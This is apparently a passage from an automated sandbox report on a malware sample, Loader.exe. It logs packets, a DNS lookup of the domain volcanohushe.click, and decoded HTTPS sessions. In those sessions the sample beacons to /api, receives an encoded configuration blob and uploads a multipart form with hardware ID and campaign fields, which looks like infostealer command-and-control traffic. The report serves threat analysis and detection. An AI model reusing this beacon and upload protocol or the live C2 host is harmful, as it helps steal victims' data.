                                                                                      Dec 24, 2024 02:17:21.907125950 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.907258034 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.907293081 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.907413960 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.907453060 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.907589912 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.907644987 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.907655001 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.907665014 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.907835007 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.907864094 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.907882929 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.908013105 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.908049107 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.951360941 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.951531887 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.951576948 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.951602936 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.951620102 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.951647043 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.951657057 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:21.951682091 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:21.951698065 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:25.319788933 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:25.319916964 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:25.319989920 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:25.321907997 CET49743443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:25.321943045 CET44349743172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:25.348287106 CET49754443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:25.348339081 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:25.348407984 CET49754443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:25.348864079 CET49754443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:25.348879099 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:26.564300060 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:26.564440966 CET49754443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:26.568228960 CET49754443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:26.568236113 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:26.568559885 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:26.577100039 CET49754443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:26.577132940 CET49754443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:26.577197075 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:27.334988117 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:27.335495949 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:27.335530043 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:27.335576057 CET49754443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:27.335608959 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:27.335659981 CET49754443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:27.336066008 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:27.343342066 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:27.343414068 CET49754443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:27.343422890 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:27.358155966 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:27.358227968 CET49754443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:27.358256102 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:27.410967112 CET49754443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:27.410990000 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:27.454659939 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:27.454746008 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:27.454811096 CET49754443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:27.455106974 CET49754443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:27.455121040 CET44349754172.67.145.201192.168.2.6
                                                                                      Dec 24, 2024 02:17:27.455158949 CET49754443192.168.2.6172.67.145.201
                                                                                      Dec 24, 2024 02:17:27.455164909 CET44349754172.67.145.201192.168.2.6
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 24, 2024 02:17:03.262599945 CET6037053192.168.2.61.1.1.1
                                                                                      Dec 24, 2024 02:17:03.581610918 CET53603701.1.1.1192.168.2.6
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Dec 24, 2024 02:17:03.262599945 CET192.168.2.61.1.1.10xff17Standard query (0)volcanohushe.clickA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Dec 24, 2024 02:17:03.581610918 CET1.1.1.1192.168.2.60xff17No error (0)volcanohushe.click172.67.145.201A (IP address)IN (0x0001)false
                                                                                      Dec 24, 2024 02:17:03.581610918 CET1.1.1.1192.168.2.60xff17No error (0)volcanohushe.click104.21.71.155A (IP address)IN (0x0001)false
                                                                                      • volcanohushe.click
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.649708172.67.145.201443504C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-24 01:17:05 UTC265OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: volcanohushe.click
                                                                                      2024-12-24 01:17:05 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                      Data Ascii: act=life
                                                                                      2024-12-24 01:17:05 UTC1130INHTTP/1.1 200 OK
                                                                                      Date: Tue, 24 Dec 2024 01:17:05 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=s8u6sj9355c5ebmk3acfmnfa12; expires=Fri, 18 Apr 2025 19:03:44 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VaSxxOwBbRdjhywXmQRbLwgDKJB7hkJHoonj%2F0cS5dX5NVjiL%2Ff8A6uhRp4Okt92AK6KvqAfFzJ2K43APzbUP4j313jO7kBOcpl2ehspFo4a7uIpNEQ3Gf%2BLix4ovIeyz6XPq%2BY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6cbfebbc020f88-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1601&min_rtt=1594&rtt_var=613&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=909&delivery_rate=1762220&cwnd=187&unsent_bytes=0&cid=047d331145215dcc&ts=1023&x=0"
                                                                                      2024-12-24 01:17:05 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                      Data Ascii: 2ok
                                                                                      2024-12-24 01:17:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.649709172.67.145.201443504C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-24 01:17:07 UTC266OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 50
                                                                                      Host: volcanohushe.click
                                                                                      2024-12-24 01:17:07 UTC50OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 26 6a 3d
                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=pqZnKP--Z2xsZXhl&j=
                                                                                      2024-12-24 01:17:07 UTC1124INHTTP/1.1 200 OK
                                                                                      Date: Tue, 24 Dec 2024 01:17:07 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: PHPSESSID=1j33b0cn59dhd0d63decobsags; expires=Fri, 18 Apr 2025 19:03:46 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      X-Frame-Options: DENY
                                                                                      X-Content-Type-Options: nosniff
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      cf-cache-status: DYNAMIC
                                                                                      vary: accept-encoding
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YJbpgHttlEqvLKqfv8%2BG95hUhvQ6Pxz6X6OUE3Z4bZB3Xc2wtL1UsB4C9y1pmBsxDnsnJhQ5jTef%2Bj1ZaA0qhA4MjmH0YTAvg0HNMcx3Oxt6kcsn9R6udOVrehqzS2f0cFK26e4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8f6cbff8fa774285-EWR
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1605&rtt_var=661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=952&delivery_rate=1584373&cwnd=32&unsent_bytes=0&cid=63b3f402598b77e3&ts=798&x=0"
                                                                                      2024-12-24 01:17:07 UTC245INData Raw: 34 39 31 63 0d 0a 4a 38 74 56 77 39 33 33 6d 37 67 33 6d 59 4a 51 4a 6a 42 41 4b 79 50 4b 2b 68 4b 47 4d 57 51 78 76 65 58 38 67 74 41 66 30 65 5a 63 36 53 50 68 35 38 4f 33 6d 6b 54 38 6f 47 70 53 51 6a 56 4f 44 2b 69 62 64 71 51 4c 41 6c 44 52 6c 70 6d 75 38 6d 6d 38 78 42 32 74 4e 4b 2b 75 6b 72 65 61 55 75 47 67 61 6e 31 4c 59 6b 35 4e 36 4d 41 77 34 31 73 47 55 4e 47 48 6e 65 6d 2f 62 37 32 46 54 36 63 79 71 37 69 55 2f 39 6c 62 39 4f 63 31 51 31 45 71 52 55 71 6e 6b 6e 2b 6b 48 55 5a 55 78 38 66 47 6f 4a 31 36 70 59 64 71 71 69 61 6f 2f 34 71 33 77 78 58 38 37 48 49 63 45 69 46 4f 51 61 61 63 64 75 31 5a 44 46 6e 5a 68 70 6a 6f 6f 48 61 33 6a 6b 2b 70 4d 61 71 79 6e 65 76 55 55 66 50 73 4d 30 6c 52 59 67 63 42 72 34 41
                                                                                      Data Ascii: 491cJ8tVw933m7g3mYJQJjBAKyPK+hKGMWQxveX8gtAf0eZc6SPh58O3mkT8oGpSQjVOD+ibdqQLAlDRlpmu8mm8xB2tNK+ukreaUuGgan1LYk5N6MAw41sGUNGHnem/b72FT6cyq7iU/9lb9Oc1Q1EqRUqnkn+kHUZUx8fGoJ16pYdqqiao/4q3wxX87HIcEiFOQaacdu1ZDFnZhpjooHa3jk+pMaqynevUUfPsM0lRYgcBr4A
                                                                                      2024-12-24 01:17:07 UTC1369INData Raw: 77 76 42 4e 56 59 64 79 57 6a 2f 57 2f 62 62 58 45 57 75 63 75 34 62 69 5a 75 59 49 56 38 2b 77 38 51 56 45 74 54 6b 43 6f 69 6e 2f 6b 55 41 35 62 32 34 32 52 37 37 31 7a 75 59 4e 4e 6f 44 43 75 75 4a 33 2f 31 56 61 37 72 6e 4a 44 53 6d 49 52 41 59 69 49 63 2b 64 48 43 30 4b 66 6d 4e 44 35 38 6e 71 2f 78 42 33 70 4d 61 2b 2b 6d 50 6e 49 58 66 44 72 4e 31 5a 5a 4b 30 52 4d 71 4a 56 36 36 31 41 47 56 4e 57 4e 6b 65 71 32 63 4c 36 43 52 61 6c 33 37 2f 2b 53 34 5a 6f 4e 75 38 4d 33 56 46 55 75 58 77 4f 53 32 47 2b 71 53 6b 5a 55 30 38 66 47 6f 4c 70 34 73 49 64 4f 70 6a 53 70 74 49 66 35 79 46 50 32 35 53 42 43 56 79 78 44 51 72 71 53 66 75 4a 51 44 31 6a 57 67 70 6e 6b 38 6a 50 7a 67 31 33 70 62 2b 47 65 6d 50 4c 57 58 2b 7a 67 63 6c 73 63 4f 77 6c 47 70 4e
                                                                                      Data Ascii: wvBNVYdyWj/W/bbXEWucu4biZuYIV8+w8QVEtTkCoin/kUA5b242R771zuYNNoDCuuJ3/1Va7rnJDSmIRAYiIc+dHC0KfmND58nq/xB3pMa++mPnIXfDrN1ZZK0RMqJV661AGVNWNkeq2cL6CRal37/+S4ZoNu8M3VFUuXwOS2G+qSkZU08fGoLp4sIdOpjSptIf5yFP25SBCVyxDQrqSfuJQD1jWgpnk8jPzg13pb+GemPLWX+zgclscOwlGpN
                                                                                      2024-12-24 01:17:07 UTC1369INData Raw: 43 31 2b 66 79 64 37 6e 71 6a 33 72 78 47 2b 71 49 36 4b 31 31 38 7a 5a 57 2f 58 6e 4a 41 52 4e 62 46 41 42 72 35 51 77 76 42 4d 4c 55 74 65 42 6a 4f 2b 2f 66 72 32 4b 53 71 77 34 71 62 2b 56 39 4e 39 52 38 4f 73 78 53 56 59 77 51 30 47 67 6e 58 48 75 57 55 59 64 6e 34 43 47 6f 4f 6f 39 67 70 4e 4f 36 77 4b 69 73 5a 76 2b 7a 42 58 6b 72 69 73 45 56 53 34 4a 47 65 69 56 65 4f 46 57 43 56 4c 56 69 5a 76 71 76 6e 57 39 68 31 65 6d 4d 36 47 7a 6e 66 50 58 57 2f 2f 6f 4f 30 39 5a 4a 45 6c 41 6f 74 67 2b 70 46 51 65 45 34 66 48 71 75 65 2b 63 4c 7a 47 63 4b 6f 35 72 37 69 44 75 63 55 62 34 71 41 31 53 42 4a 36 43 55 32 68 6d 48 76 75 56 77 5a 55 30 6f 4b 64 35 37 46 77 74 49 35 4c 72 6a 4f 74 74 70 6a 2f 32 6c 4c 2f 35 53 42 42 57 79 35 46 41 65 62 59 64 2f 77
                                                                                      Data Ascii: C1+fyd7nqj3rxG+qI6K118zZW/XnJARNbFABr5QwvBMLUteBjO+/fr2KSqw4qb+V9N9R8OsxSVYwQ0GgnXHuWUYdn4CGoOo9gpNO6wKisZv+zBXkrisEVS4JGeiVeOFWCVLViZvqvnW9h1emM6GznfPXW//oO09ZJElAotg+pFQeE4fHque+cLzGcKo5r7iDucUb4qA1SBJ6CU2hmHvuVwZU0oKd57FwtI5LrjOttpj/2lL/5SBBWy5FAebYd/w
                                                                                      2024-12-24 01:17:07 UTC1369INData Raw: 34 43 53 6f 4f 6f 39 75 6f 31 58 70 7a 6d 6f 73 70 50 78 33 56 76 32 36 7a 52 50 56 53 56 50 54 4b 43 56 64 65 64 53 41 6c 6e 4e 68 4a 58 71 76 33 66 7a 79 67 57 75 4c 2b 48 6e 31 64 37 57 66 4f 76 37 49 46 49 53 50 51 64 59 36 4a 39 38 70 41 74 47 55 4e 43 4f 6b 65 69 36 63 72 79 41 53 36 38 78 72 4c 71 61 38 38 68 64 39 65 30 35 53 31 6b 77 53 55 79 73 6c 48 54 73 57 41 77 54 6b 63 65 5a 2b 50 49 6c 38 37 46 49 70 6a 65 69 71 64 58 6d 6c 45 79 37 35 7a 34 45 43 6d 4a 46 54 36 69 58 66 4f 68 59 44 6c 4c 54 69 5a 6e 6c 75 33 57 37 6c 6b 53 74 50 36 43 78 6d 76 6a 65 55 50 37 6b 4e 55 42 55 4c 51 6b 50 36 4a 39 6f 70 41 74 47 66 50 69 79 33 4d 47 49 50 61 7a 4b 58 4f 6b 77 72 66 2f 4e 75 64 5a 57 39 2b 67 39 51 6c 73 75 51 30 69 6a 6c 48 76 67 58 77 39 57
                                                                                      Data Ascii: 4CSoOo9uo1XpzmospPx3Vv26zRPVSVPTKCVdedSAlnNhJXqv3fzygWuL+Hn1d7WfOv7IFISPQdY6J98pAtGUNCOkei6cryAS68xrLqa88hd9e05S1kwSUyslHTsWAwTkceZ+PIl87FIpjeiqdXmlEy75z4ECmJFT6iXfOhYDlLTiZnlu3W7lkStP6CxmvjeUP7kNUBULQkP6J9opAtGfPiy3MGIPazKXOkwrf/NudZW9+g9QlsuQ0ijlHvgXw9W
                                                                                      2024-12-24 01:17:07 UTC1369INData Raw: 47 30 62 37 53 4e 56 36 63 36 72 72 65 64 38 4e 74 52 2f 75 30 30 53 46 67 6a 54 6b 2b 6d 6b 44 43 71 45 77 46 4c 6e 39 2f 65 77 61 4a 6d 6f 5a 4a 49 69 44 71 75 2f 34 71 33 77 78 58 38 37 48 49 63 45 69 74 62 52 61 57 4b 65 65 4e 64 43 56 44 4e 68 70 50 72 6f 48 71 38 67 45 4b 6c 4d 61 36 35 6c 50 7a 51 57 66 7a 6c 4f 55 74 65 59 67 63 42 72 34 41 77 76 42 4d 6f 57 4d 79 51 6e 65 36 35 61 36 6a 45 57 75 63 75 34 62 69 5a 75 59 49 56 2b 4f 73 35 51 46 49 75 53 55 57 6c 6d 47 4c 72 56 41 46 61 31 4a 57 55 35 37 56 32 75 34 39 4b 72 79 57 74 73 59 66 38 79 45 65 37 72 6e 4a 44 53 6d 49 52 41 5a 36 66 59 50 52 51 52 47 4c 4a 68 49 6a 72 76 33 48 7a 6d 77 75 77 64 36 61 7a 31 61 47 61 55 2f 54 70 4d 55 74 54 4b 30 56 4d 72 5a 46 31 35 56 55 43 57 64 57 48 6d
                                                                                      Data Ascii: G0b7SNV6c6rred8NtR/u00SFgjTk+mkDCqEwFLn9/ewaJmoZJIiDqu/4q3wxX87HIcEitbRaWKeeNdCVDNhpProHq8gEKlMa65lPzQWfzlOUteYgcBr4AwvBMoWMyQne65a6jEWucu4biZuYIV+Os5QFIuSUWlmGLrVAFa1JWU57V2u49KryWtsYf8yEe7rnJDSmIRAZ6fYPRQRGLJhIjrv3Hzmwuwd6az1aGaU/TpMUtTK0VMrZF15VUCWdWHm
                                                                                      2024-12-24 01:17:07 UTC1369INData Raw: 39 6e 51 57 75 4f 2b 48 6e 31 66 72 64 56 76 72 71 4f 30 68 64 4a 55 31 54 6f 70 39 69 35 56 49 4e 58 74 4f 48 6b 2b 32 34 66 4c 71 4a 53 61 51 77 70 72 43 51 75 5a 51 56 2f 50 68 79 48 42 49 44 52 45 71 6b 77 79 71 6b 54 45 68 4b 6e 34 43 53 6f 4f 6f 39 73 34 35 41 6f 7a 71 69 73 4a 62 72 32 31 50 70 34 44 39 4f 51 43 68 43 52 4b 57 56 66 65 64 56 41 46 6a 54 6c 5a 66 67 73 58 62 7a 79 67 57 75 4c 2b 48 6e 31 64 72 4e 51 2f 48 6e 50 6c 4a 5a 49 30 70 58 70 59 67 77 71 68 4d 58 56 4d 37 48 78 76 61 69 61 72 53 62 43 37 42 33 70 72 50 56 6f 5a 70 54 38 75 59 31 51 6c 77 77 54 45 65 6e 6c 33 6e 74 56 77 35 51 33 34 4f 61 35 37 64 2b 76 34 39 43 71 6a 69 6c 74 70 76 77 31 52 57 31 6f 44 56 63 45 6e 6f 4a 59 4c 4f 62 66 4f 6b 54 47 52 33 47 78 35 6e 73 38 69
                                                                                      Data Ascii: 9nQWuO+Hn1frdVvrqO0hdJU1Top9i5VINXtOHk+24fLqJSaQwprCQuZQV/PhyHBIDREqkwyqkTEhKn4CSoOo9s45AozqisJbr21Pp4D9OQChCRKWVfedVAFjTlZfgsXbzygWuL+Hn1drNQ/HnPlJZI0pXpYgwqhMXVM7HxvaiarSbC7B3prPVoZpT8uY1QlwwTEenl3ntVw5Q34Oa57d+v49Cqjiltpvw1RW1oDVcEnoJYLObfOkTGR3Gx5ns8i
                                                                                      2024-12-24 01:17:07 UTC1369INData Raw: 36 52 65 71 71 5a 44 2b 7a 42 66 4f 34 7a 78 4b 56 54 51 4a 58 70 66 57 4d 4f 74 4a 52 67 76 6d 6e 74 37 6e 76 6a 33 72 78 46 43 75 4e 36 61 6c 67 2f 37 57 52 50 44 74 50 6d 5a 64 4a 56 39 43 70 35 74 68 37 52 38 4e 58 70 2f 4a 33 75 65 71 50 65 76 45 61 71 34 68 6f 70 43 57 36 4e 4d 56 74 61 41 31 55 68 4a 36 43 58 2f 6f 69 6e 50 30 55 41 6c 43 34 63 66 47 2b 59 77 39 75 4a 4a 43 75 54 53 33 74 4a 6a 31 79 32 75 37 75 47 59 57 41 48 41 62 45 37 66 59 62 39 73 64 52 6c 4b 66 33 36 66 35 38 6d 76 7a 33 42 66 6e 64 37 50 2f 7a 62 6d 64 56 75 6e 79 4e 45 64 45 49 51 35 2f 6c 72 39 6d 37 6c 51 57 56 4d 69 49 33 71 37 79 63 76 50 63 66 4f 6b 2b 70 71 53 45 37 39 64 46 2f 4b 41 4e 43 68 49 36 43 52 6e 6f 72 58 50 71 58 51 46 46 7a 73 71 35 39 72 68 36 6f 34 4e
                                                                                      Data Ascii: 6ReqqZD+zBfO4zxKVTQJXpfWMOtJRgvmnt7nvj3rxFCuN6alg/7WRPDtPmZdJV9Cp5th7R8NXp/J3ueqPevEaq4hopCW6NMVtaA1UhJ6CX/oinP0UAlC4cfG+Yw9uJJCuTS3tJj1y2u7uGYWAHAbE7fYb9sdRlKf36f58mvz3Bfnd7P/zbmdVunyNEdEIQ5/lr9m7lQWVMiI3q7ycvPcfOk+pqSE79dF/KANChI6CRnorXPqXQFFzsq59rh6o4N
                                                                                      2024-12-24 01:17:07 UTC1369INData Raw: 76 4f 62 38 74 70 53 36 2f 59 70 43 46 6f 68 55 31 75 57 70 6c 76 6f 56 51 46 4a 32 49 47 34 77 50 49 7a 38 34 73 46 38 51 37 68 39 39 58 47 6c 42 58 6a 6f 47 6f 45 5a 79 46 48 54 36 2b 4f 59 61 6c 37 4a 57 6e 6c 78 62 4c 6e 70 7a 2b 48 67 31 57 34 50 4b 79 7a 31 62 65 61 55 37 75 34 59 67 6f 53 4a 6c 67 42 38 4d 67 69 76 77 5a 56 42 49 2f 56 67 61 36 72 50 61 58 45 48 66 74 35 34 61 33 56 6f 5a 6f 53 2b 50 49 67 51 6c 45 30 53 67 61 57 70 6c 66 71 56 41 64 46 7a 35 43 52 33 6f 78 6f 73 49 70 4c 72 69 47 77 2f 39 75 35 31 52 57 6a 32 58 49 4d 45 68 30 48 41 62 44 59 4b 4b 52 6d 42 56 33 52 67 49 6a 78 2f 31 71 39 67 30 53 2f 4a 37 61 77 31 62 65 61 55 37 75 34 59 41 6f 53 4a 6c 67 42 38 4d 67 69 76 77 5a 56 42 49 2f 56 67 61 36 72 50 61 58 45 48 66 74 35
                                                                                      Data Ascii: vOb8tpS6/YpCFohU1uWplvoVQFJ2IG4wPIz84sF8Q7h99XGlBXjoGoEZyFHT6+OYal7JWnlxbLnpz+Hg1W4PKyz1beaU7u4YgoSJlgB8MgivwZVBI/Vga6rPaXEHft54a3VoZoS+PIgQlE0SgaWplfqVAdFz5CR3oxosIpLriGw/9u51RWj2XIMEh0HAbDYKKRmBV3RgIjx/1q9g0S/J7aw1beaU7u4YAoSJlgB8MgivwZVBI/Vga6rPaXEHft5
                                                                                      2024-12-24 01:17:07 UTC1369INData Raw: 76 36 55 75 33 6a 63 67 6f 53 4c 67 6b 5a 36 4a 6c 36 39 46 34 4a 56 4a 4f 41 68 4f 66 79 4d 2f 4f 4b 42 66 46 33 6f 4c 57 46 39 4e 56 53 74 2b 59 38 53 68 49 39 42 31 6a 6f 6a 6a 43 38 41 45 67 54 7a 63 66 47 6f 50 56 2b 6f 5a 5a 44 71 69 47 69 2b 4b 76 48 39 30 66 38 38 44 45 47 59 79 39 4e 56 37 32 62 59 4f 4e 74 4f 48 37 4e 67 49 37 6a 38 45 79 6c 68 30 57 6e 4d 4f 48 78 31 65 47 61 44 62 76 4e 49 45 4e 43 49 51 6b 50 36 4a 51 77 76 42 4d 4c 51 64 69 58 6e 61 79 31 5a 37 54 45 57 75 63 75 34 61 6e 56 6f 59 6b 62 75 2f 4a 79 48 42 4a 6c 52 30 79 70 6d 33 37 6e 51 52 52 56 33 4a 47 64 70 34 78 44 6e 70 5a 43 75 54 54 6a 6a 70 6a 39 7a 45 44 34 38 44 56 36 62 41 39 62 52 72 69 62 4d 73 68 55 43 31 2f 68 75 61 6e 78 74 57 33 78 6f 6b 61 2f 4e 4f 48 78 31
                                                                                      Data Ascii: v6Uu3jcgoSLgkZ6Jl69F4JVJOAhOfyM/OKBfF3oLWF9NVSt+Y8ShI9B1jojjC8AEgTzcfGoPV+oZZDqiGi+KvH90f88DEGYy9NV72bYONtOH7NgI7j8Eylh0WnMOHx1eGaDbvNIENCIQkP6JQwvBMLQdiXnay1Z7TEWucu4anVoYkbu/JyHBJlR0ypm37nQRRV3JGdp4xDnpZCuTTjjpj9zED48DV6bA9bRribMshUC1/huanxtW3xoka/NOHx1


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.649710172.67.145.201443504C:\Users\user\Desktop\Loader.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-24 01:17:09 UTC276OUTPOST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: multipart/form-data; boundary=SG98CQFNYP
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 12814
                                                                                      Host: volcanohushe.click
                                                                                      2024-12-24 01:17:09 UTC12814OUTData Raw: 2d 2d 53 47 39 38 43 51 46 4e 59 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 37 44 30 42 36 41 35 33 41 45 45 33 36 38 32 34 36 39 32 36 45 35 33 33 43 36 34 44 37 0d 0a 2d 2d 53 47 39 38 43 51 46 4e 59 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 47 39 38 43 51 46 4e 59 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 0d 0a 2d 2d 53 47 39 38 43 51 46 4e 59 50 0d 0a 43 6f 6e 74 65
                                                                                      Data Ascii: --SG98CQFNYPContent-Disposition: form-data; name="hwid"E887D0B6A53AEE368246926E533C64D7--SG98CQFNYPContent-Disposition: form-data; name="pid"2--SG98CQFNYPContent-Disposition: form-data; name="lid"pqZnKP--Z2xsZXhl--SG98CQFNYPConte
                                                                                      2024-12-24 01:17:10 UTC1134INHTTP/1.1 200 OK
                                                                                      Date: Tue, 24 Dec 2024 01:17:10 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
